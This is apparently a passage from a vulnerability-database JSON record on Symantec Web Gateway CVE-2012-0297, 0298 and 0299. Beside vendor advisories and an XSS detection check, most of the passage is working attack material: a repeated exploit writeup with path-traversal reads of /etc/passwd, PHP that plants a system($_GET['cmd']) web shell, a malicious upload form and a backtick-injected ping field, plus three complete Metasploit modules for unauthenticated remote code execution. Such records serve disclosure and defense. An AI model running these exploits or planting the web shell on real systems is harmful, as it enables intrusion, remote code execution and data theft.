script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"symantec_web_gateway/installed\");\n script_tag(name:\"summary\", value:\"Symantec Web Gateway is prone to a cross-site scripting vulnerability\nbecause it fails to properly sanitize user-supplied input.\");\n\n script_tag(name:\"impact\", value:\"An attacker may leverage this issue to execute arbitrary script code\nin the browser of an unsuspecting user in the context of the affected\nsite. This may allow the attacker to steal cookie-based authentication\ncredentials and launch other attacks.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the referenced vendor advisory for more information.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))exit(0);\nif(!dir = get_app_location(cpe:CPE, port:port))exit(0);\n\nurl = string(dir, \"/spywall/timer.php?d=0&l=0'<script>alert(/xss-test/)</script>&profile=0\");\n\nif(http_vuln_check(port:port, url:url,pattern:\"<script>alert\$/xss-test/\$</script>\", check_header:TRUE)) {\n\n security_message(port:port);\n exit(0);\n\n}\n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "securityvulns": [{"lastseen": "2021-06-08T19:13:51", "description": "Code execution, unfiltered shell characters.", "cvss3": {}, "published": "2012-06-13T00:00:00", "type": "securityvulns", "title": "Symantec WebGateway security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2012-0297", "CVE-2012-0299"], "modified": "2012-06-13T00:00:00", "id": "SECURITYVULNS:VULN:12416", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12416", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:44", "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nZDI-12-091 : Symantec Web Gateway upload_file Remote Code Execution\r\nVulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-091\r\nJune 8, 2012\r\n\r\n- -- CVE ID:\r\n\r\nCVE-2012-0299\r\n\r\n- -- CVSS:\r\n\r\n7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P\r\n\r\n- -- Affected Vendors:\r\n\r\nSymantec\r\n\r\n- -- Affected Products:\r\n\r\nSymantec Web Gateway\r\n\r\n- -- Vulnerability Details:\r\n\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Symantec Web Gateway. Authentication is not\r\nrequired to exploit this vulnerability. \r\n\r\nThe specific flaw exists because Symantec Web Gateway allows\r\nunauthenticated users to upload a file while preserving the file extension.\r\nThis allows users to upload additional script files that can be used to\r\nexecute remote code from user supplied commands under the context of the\r\nwebserver. \r\n\r\n- -- Vendor Response:\r\n\r\nSymantec has issued an update to correct this vulnerability. More details\r\ncan be found at:\r\n\r\nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se\r\ncurity_advisory&pvid=security_advisory&year=2012&suid=20120517_00\r\n\r\n- -- Disclosure Timeline:\r\n\r\n2011-11-22 - Vulnerability reported to vendor\r\n2012-06-08 - Coordinated public release of advisory\r\n\r\n- -- Credit:\r\n\r\nThis vulnerability was discovered by:\r\n\r\n* Tenable Network Security\r\n\r\n- -- About the Zero Day Initiative (ZDI):\r\n\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP Desktop 10.2.0 (Build 1950)\r\nCharset: utf-8\r\n\r\nwsBVAwUBT9JmIFVtgMGTo1scAQIcsggAiLXplifuJP03Yc8Z5FD6BofgxIpTW4pe\r\nA1bAHANbzqZUEOeK4+RO0/6xy7mN5urbMZiLRc/iW3GaCYkWBcUUZ1CyT//MsDZ7\r\nvqkR/kWXENtCBUip76vICdAWWK87FvlZa6gZN/kAnj5RiGLZ1QCUddc9yBIApQ/B\r\nu87rKoIcrfccUsM0gwgy9qmbWS52I8hfOUMfXIJs5w+7k8mbIkDbnBR0gSh3bGe3\r\nLMsOp2VxXEDx5Kc3/d53ldIASEQPbPAa4GyYkvrzGdSxACItij+4RDOaaszRrnZE\r\nQbPe7jqJKsxWW8wei+Y4MXIPzlV5QqpVA/NDeR74rF7JyPuLo6c1mA==\r\n=/0OU\r\n-----END PGP SIGNATURE-----\r\n", "cvss3": {}, "published": "2012-06-13T00:00:00", "type": "securityvulns", "title": "ZDI-12-091 : Symantec Web Gateway upload_file Remote Code Execution Vulnerability", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2012-0299"], "modified": "2012-06-13T00:00:00", "id": "SECURITYVULNS:DOC:28147", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28147", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:44", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nZDI-12-090 : Symantec Web Gateway Shell Command Injection Remote Code\r\nExecution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-090\r\nJune 8, 2012\r\n\r\n- -- CVE ID:\r\n\r\nCVE-2012-0297\r\n\r\n- -- CVSS:\r\n7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P\r\n\r\n- -- Affected Vendors:\r\n\r\nSymantec\r\n\r\n- -- Affected Products:\r\n\r\nSymantec Web Gateway\r\n\r\n- -- Vulnerability Details:\r\n\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Symantec Web Gateway. Authentication is not\r\nrequired to exploit this vulnerability. \r\n\r\nThe specific flaw exists due to insufficiently filtered user-supplied data\r\nused in a call to exec() in multiple script pages. The affected scripts are\r\nlocated in '/spywall/ipchange.php' and 'network.php'. There is also a flaw\r\nin '/spywall/download_file.php' that allows unauthenticated users to\r\ndownload and delete any file on the server. \r\n\r\n- -- Vendor Response:\r\n\r\nSymantec has issued an update to correct this vulnerability. More details\r\ncan be found at:\r\n\r\nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se\r\ncurity_advisory&pvid=security_advisory&year=2012&suid=20120517_00\r\n\r\n- -- Disclosure Timeline:\r\n\r\n2011-11-22 - Vulnerability reported to vendor\r\n2012-06-08 - Coordinated public release of advisory\r\n\r\n- -- Credit:\r\n\r\nThis vulnerability was discovered by:\r\n\r\n* Tenable Network Security\r\n\r\n- -- About the Zero Day Initiative (ZDI):\r\n\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP Desktop 10.2.0 (Build 1950)\r\nCharset: utf-8\r\n\r\nwsBVAwUBT9JkrlVtgMGTo1scAQK0Bwf+Ns64PZhwAAyfloBVx8Pb/6DTVjd8g1yp\r\nXi5ynP006/9fLSnI2UACJdFJqUj0MPM6YUuOgpsGfncxVYVAc96pawv3pxfsfwfm\r\nkkAo2aUPIsx4xQP3Mtz3YNpWb8jl/L1SUiNLu4ogKhuA1y82gXIRot4wNq9s0DWr\r\n11d8pTUgHJtPnlH43bWAvzqnnsf0OapaePuHEfOArEZK5kUBangirZSOyYiH+zfG\r\nAxl29pM2pLEC2ZNtJ/rbEaQhrG1chwt9+QIiQWRb5Z0V7FssO1M6AduMF7D71LoF\r\nHxgfwMBHPTlGJoWYb3LovAfDrlbeJm5sQGIabUha4TNUnAuInSURBQ==\r\n=fH5n\r\n-----END PGP SIGNATURE-----\r\n", "cvss3": {}, "published": "2012-06-13T00:00:00", "type": "securityvulns", "title": "ZDI-12-090 : Symantec Web Gateway Shell Command Injection Remote Code Execution Vulnerability", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2012-0297"], "modified": "2012-06-13T00:00:00", "id": "SECURITYVULNS:DOC:28148", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28148", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2018-07-03T19:16:51", "description": "", "cvss3": {}, "published": "2014-07-01T00:00:00", "type": "seebug", "title": "symantec web gateway 5.0.2.8 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0297", "CVE-2012-0298"], "modified": "2014-07-01T00:00:00", "id": "SSV:73332", "href": "https://www.seebug.org/vuldb/ssvid-73332", "sourceData": "\n Software: Symantec Web Gateway\r\nCurrent Software Version: 5.0.2.8\r\nProduct homepage: www.symantec.com\r\nAuthor: S2 Crew [Hungary]\r\nCVE: CVE-2012-0297, CVE-2012-0298, ???\r\n\r\nFile include:\r\n https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd\r\n\r\nFile include and OS command execution:\r\n http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd\r\n You can execute OS commands just include the error_log:\r\n /usr/local/apache2/logs/\r\n -rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log\r\n -rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log\r\n\r\n Make a connection to port 80:\r\n <?php\r\n $f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');\r\n $cmd = "<?php system(\\$_GET['cmd']); ?>";\r\n fputs($f,$cmd);\r\n fclose($f);\r\n\t\tprint "Shell creation done<br>";\r\n ?>\r\n\r\nArbitary file download and delete:\r\n https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog\r\n\td parameter: the complete filename \r\n After the download process application removes the original file with root access! :)\r\n\r\n Command execution methods:\r\n 1.Method\r\n Download and delete the /var/www/html/ciu/.htaccess file.\r\n After it you can access the ciu interface on web.\r\n There is an upload script: /ciu/uploadFile.php\r\n\tUser can control the filename and the upload location:\r\n $_FILES['uploadFile'];\r\n $_POST['uploadLocation'];\r\n\r\n 2.Method\r\n <form action="https://192.168.82.192/ciu/remoteRepairs.php" method="POST" enctype="multipart/form-data">\r\n <input type="file" name="uploadFile">\r\n <input type="text" name="action" value="upload">\r\n <input type="text" name="uploadLocation" value="/var/www/html/spywall/cleaner/">\r\n <input type="hidden" name="configuration" value="test">\r\n <input type="submit" value="upload!">\r\n </form>\r\n\t\r\n\tThe "/var/www/html/spywall/cleaner" is writeable by www-data.\r\n\r\nCommand execution after authentication:\r\n\r\n http://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove)\r\n\r\n From the modified POST message:\r\n Content-Disposition: form-data; name="pingaddress"\r\n 127.0.0.1`whoami>/tmp/1234.txt`\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-73332", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:06:08", "description": "\nsymantec Web gateway 5.0.2.8 - Multiple Vulnerabilities", "cvss3": {}, "published": "2012-06-27T00:00:00", "type": "exploitpack", "title": "symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0298", "CVE-2012-0297"], "modified": "2012-06-27T00:00:00", "id": "EXPLOITPACK:9A23BC40C97079E951A8BC4B95B92342", "href": "", "sourceData": "Software: Symantec Web Gateway\nCurrent Software Version: 5.0.2.8\nProduct homepage: www.symantec.com\nAuthor: S2 Crew [Hungary]\nCVE: CVE-2012-0297, CVE-2012-0298, ???\n\nFile include:\n https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd\n\nFile include and OS command execution:\n http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd\n You can execute OS commands just include the error_log:\n /usr/local/apache2/logs/\n -rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log\n -rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log\n\n Make a connection to port 80:\n <?php\n $f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');\n $cmd = \"<?php system(\\$_GET['cmd']); ?>\";\n fputs($f,$cmd);\n fclose($f);\n\t\tprint \"Shell creation done<br>\";\n ?>\n\nArbitary file download and delete:\n https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog\n\td parameter: the complete filename \n After the download process application removes the original file with root access! :)\n\n Command execution methods:\n 1.Method\n Download and delete the /var/www/html/ciu/.htaccess file.\n After it you can access the ciu interface on web.\n There is an upload script: /ciu/uploadFile.php\n\tUser can control the filename and the upload location:\n $_FILES['uploadFile'];\n $_POST['uploadLocation'];\n\n 2.Method\n <form action=\"https://192.168.82.192/ciu/remoteRepairs.php\" method=\"POST\" enctype=\"multipart/form-data\">\n <input type=\"file\" name=\"uploadFile\">\n <input type=\"text\" name=\"action\" value=\"upload\">\n <input type=\"text\" name=\"uploadLocation\" value=\"/var/www/html/spywall/cleaner/\">\n <input type=\"hidden\" name=\"configuration\" value=\"test\">\n <input type=\"submit\" value=\"upload!\">\n </form>\n\t\n\tThe \"/var/www/html/spywall/cleaner\" is writeable by www-data.\n\nCommand execution after authentication:\n\n http://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove)\n\n From the modified POST message:\n Content-Disposition: form-data; name=\"pingaddress\"\n 127.0.0.1`whoami>/tmp/1234.txt`", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:06", "description": "", "cvss3": {}, "published": "2012-06-27T00:00:00", "type": "packetstorm", "title": "Symantec Web Gateway 5.0.28 LFI / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0298", "CVE-2012-0297"], "modified": "2012-06-27T00:00:00", "id": "PACKETSTORM:114231", "href": "https://packetstormsecurity.com/files/114231/Symantec-Web-Gateway-5.0.28-LFI-Code-Execution.html", "sourceData": "`Software: Symantec Web Gateway \nCurrent Software Version: 5.0.2.8 \nProduct homepage: www.symantec.com \nAuthor: S2 Crew [Hungary] \nCVE: CVE-2012-0297, CVE-2012-0298, ??? \n \nFile include: \nhttps://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd \n \nFile include and OS command execution: \nhttp://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd \nYou can execute OS commands just include the error_log: \n/usr/local/apache2/logs/ \n-rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log \n-rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log \n \nMake a connection to port 80: \n<?php \n$f = fopen('/var/www/html/spywall/cleaner/cmd.php','w'); \n$cmd = \"<?php system(\\$_GET['cmd']); ?>\"; \nfputs($f,$cmd); \nfclose($f); \nprint \"Shell creation done<br>\"; \n?> \n \nArbitary file download and delete: \nhttps://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog \nd parameter: the complete filename \nAfter the download process application removes the original file with root access! :) \n \nCommand execution methods: \n1.Method \nDownload and delete the /var/www/html/ciu/.htaccess file. \nAfter it you can access the ciu interface on web. \nThere is an upload script: /ciu/uploadFile.php \nUser can control the filename and the upload location: \n$_FILES['uploadFile']; \n$_POST['uploadLocation']; \n \n2.Method \n<form action=\"https://192.168.82.192/ciu/remoteRepairs.php\" method=\"POST\" enctype=\"multipart/form-data\"> \n<input type=\"file\" name=\"uploadFile\"> \n<input type=\"text\" name=\"action\" value=\"upload\"> \n<input type=\"text\" name=\"uploadLocation\" value=\"/var/www/html/spywall/cleaner/\"> \n<input type=\"hidden\" name=\"configuration\" value=\"test\"> \n<input type=\"submit\" value=\"upload!\"> \n</form> \n \nThe \"/var/www/html/spywall/cleaner\" is writeable by www-data. \n \nCommand execution after authentication: \n \nhttp://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove) \n \nFrom the modified POST message: \nContent-Disposition: form-data; name=\"pingaddress\" \n127.0.0.1`whoami>/tmp/1234.txt` \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/114231/symantecwg-lfiexec.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:20:02", "description": "", "cvss3": {}, "published": "2012-06-11T00:00:00", "type": "packetstorm", "title": "Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0299"], "modified": "2012-06-11T00:00:00", "id": "PACKETSTORM:113486", "href": "https://packetstormsecurity.com/files/113486/Symantec-Web-Gateway-5.0.2.8-Arbitrary-PHP-File-Upload-Vulnerability.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability\", \n'Description' => %q{ \nThis module exploits a file upload vulnerability found in Symantec Web Gateway's \nHTTP service. Due to the incorrect use of file extensions in the upload_file() \nfunction, this allows us to abuse the spywall/blocked_file.php file in order to \nupload a malicious PHP file without any authentication, which results in arbitrary \ncode execution. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Tenable Network Security', # Vulnerability Discovery \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2012-0299' ], \n[ 'OSVDB', '82025' ], \n[ 'BID', '53443' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-091' ], \n[ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ] \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\" \n}, \n'DefaultOptions' => \n{ \n'ExitFunction' => \"none\" \n}, \n'Platform' => ['php'], \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n['Symantec Web Gateway 5.0.2.8', {}], \n], \n'Privileged' => false, \n'DisclosureDate' => \"May 17 2012\", \n'DefaultTarget' => 0)) \nend \n \n \ndef check \nres = send_request_raw({ \n'method' => 'GET', \n'uri' => '/spywall/login.php' \n}) \n \nif res and res.body =~ /\\<title\\>Symantec Web Gateway\\<\\/title\\>/ \nreturn Exploit::CheckCode::Detected \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \ndef on_new_session(client) \nif client.type == \"meterpreter\" \nclient.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\") \nclient.fs.file.rm(\"temp.php\") \nelse \nclient.shell_command_token(\"rm temp.php\") \nend \nend \n \ndef exploit \nuri = target_uri.path \nuri << '/' if uri[-1,1] != '/' \n \npeer = \"#{rhost}:#{rport}\" \npayload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php' \nbefore_filename = rand_text_alpha(rand(10) + 5) \nafter_filename = rand_text_alpha(rand(10) + 5) \n \npost_data = Rex::MIME::Message.new \npost_data.add_part(\"true\", nil, nil, \"form-data; name=\\\"submitted\\\"\") \npost_data.add_part(before_filename, \"application/octet-stream\", nil, \"form-data; name=\\\"before_filename\\\"\") \npost_data.add_part(after_filename, \"application/octet-stream\", nil, \"form-data; name=\\\"after_filename\\\"\") \npost_data.add_part(\"<?php #{payload.encoded} ?>\", \"image/gif\", nil, \"form-data; name=\\\"new_image\\\"; filename=\\\"#{payload_name}\\\"\") \n \nprint_status(\"#{peer} - Sending PHP payload (#{payload_name})\") \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{uri}spywall/blocked_file.php\", \n'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\", \n'data' => post_data.to_s \n}) \n \n# If the server returns 200 and the body contains the name \n# of the default file, we assume we uploaded the malicious \n# file successfully \nif not res or res.code != 200 or res.body !~ /temp.php/ \nprint_error(\"#{peer} - File wasn't uploaded, aborting!\") \nreturn \nend \n \nprint_status(\"#{peer} - Executing PHP payload (#{payload_name})\") \n# Execute our payload \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => \"#{uri}spywall/images/upload/temp/temp.php\" \n}) \n \n# If we don't get a 200 when we request our malicious payload, we suspect \n# we don't have a shell, either. Print the status code for debugging purposes. \nif res and res.code != 200 \nprint_status(\"#{peer} - Server returned #{res.code.to_s}\") \nend \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/113486/symantec_web_gateway_file_upload.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:14:57", "description": "", "cvss3": {}, "published": "2012-05-28T00:00:00", "type": "packetstorm", "title": "Symantec Web Gateway 5.0.2.8 Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0297"], "modified": "2012-05-28T00:00:00", "id": "PACKETSTORM:113090", "href": "https://packetstormsecurity.com/files/113090/Symantec-Web-Gateway-5.0.2.8-Command-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability found in Symantec Web Gateway's HTTP \nservice. By injecting PHP code in the access log, it is possible to load it \nwith a directory traversal flaw, which allows remote code execution under the \ncontext of 'apache'. Please note that it may take up to several minutes to \nretrieve access_log, which is about the amount of time required to see a shell \nback. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', #Discovery \n'muts', #PoC \n'sinn3r' #Metasploit \n], \n'References' => \n[ \n['CVE', '2012-0297'], \n['EDB', '18932'], \n['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00'] \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\" \n}, \n'DefaultOptions' => \n{ \n'WfsDelay' => 300, #5 minutes \n'DisablePayloadHandler' => 'false', \n'ExitFunction' => \"none\" \n}, \n'Platform' => ['php'], \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n['Symantec Web Gateway 5.0.2.8', {}], \n], \n'Privileged' => false, \n'DisclosureDate' => \"May 17 2012\", \n'DefaultTarget' => 0)) \nend \n \n \ndef check \nres = send_request_raw({ \n'method' => 'GET', \n'uri' => '/spywall/login.php' \n}) \n \nif res and res.body =~ /\\<title\\>Symantec Web Gateway\\<\\/title\\>/ \nreturn Exploit::CheckCode::Detected \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \n \ndef exploit \npeer = \"#{rhost}:#{rport}\" \n \nphp = %Q|<?php #{payload.encoded} ?>| \n \n# Inject PHP to log \nprint_status(\"#{peer} - Injecting PHP to log...\") \nres = send_request_raw({ \n'method' => 'GET', \n'uri' => \"/#{php}\" \n}) \n \nselect(nil, nil, nil, 1) \n \n# Use the directory traversal to load the PHP code \n# access_log takes a long time to retrieve \nprint_status(\"#{peer} - Loading PHP code..\") \nsend_request_raw({ \n'method' => 'GET', \n'uri' => '/spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log' \n}) \n \nprint_status(\"#{peer} - Waiting for a session, may take some time...\") \n \nselect(nil, nil, nil, 1) \n \nhandler \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/113090/symantec_web_gateway_lfi.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:12:40", "description": "", "cvss3": {}, "published": "2012-06-11T00:00:00", "type": "packetstorm", "title": "Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0297"], "modified": "2012-06-11T00:00:00", "id": "PACKETSTORM:113485", "href": "https://packetstormsecurity.com/files/113485/Symantec-Web-Gateway-5.0.2.8-ipchange.php-Command-Injection.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection\", \n'Description' => %q{ \nThis module exploits a command injection vulnerability found in Symantec Web \nGateway's HTTP service due to the insecure usage of the exec() function. This module \nabuses the spywall/ipchange.php file to execute arbitrary OS commands without \nauthentication. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Tenable Network Security', # Vulnerability Discovery \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2012-0297' ], \n[ 'BID', '53444' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-090' ], \n[ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ] \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\\x0d\\x0a\\x26\", \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl', \n} \n}, \n'Platform' => ['unix'], \n'Arch' => ARCH_CMD, \n'Targets' => \n[ \n['Symantec Web Gateway 5.0.2.8', {}], \n], \n'Privileged' => false, \n'DisclosureDate' => \"May 17 2012\", \n'DefaultTarget' => 0)) \nend \n \n \ndef check \nres = send_request_raw({ \n'method' => 'GET', \n'uri' => '/spywall/login.php' \n}) \n \nif res and res.body =~ /\\<title\\>Symantec Web Gateway\\<\\/title\\>/ \nreturn Exploit::CheckCode::Detected \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \ndef exploit \nuri = target_uri.path \nuri << '/' if uri[-1,1] != '/' \n \npeer = \"#{rhost}:#{rport}\" \n \npost_data = \"subnet=\" \npost_data << \"\\\";\" + payload.raw + \";#\" \n \nprint_status(\"#{peer} - Sending Command injection\") \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{uri}spywall/ipchange.php\", \n'data' => post_data \n}) \n \n# If the server doesn't return the default redirection, probably \n# something is wrong \nif not res or res.code != 302 or res.headers['Location'] !~ /SW\\/admin_config.php/ \nprint_error(\"#{peer} - Probably command not executed, aborting!\") \nreturn \nend \n \nend \n \n \nend \n`\n", "sourceHref": 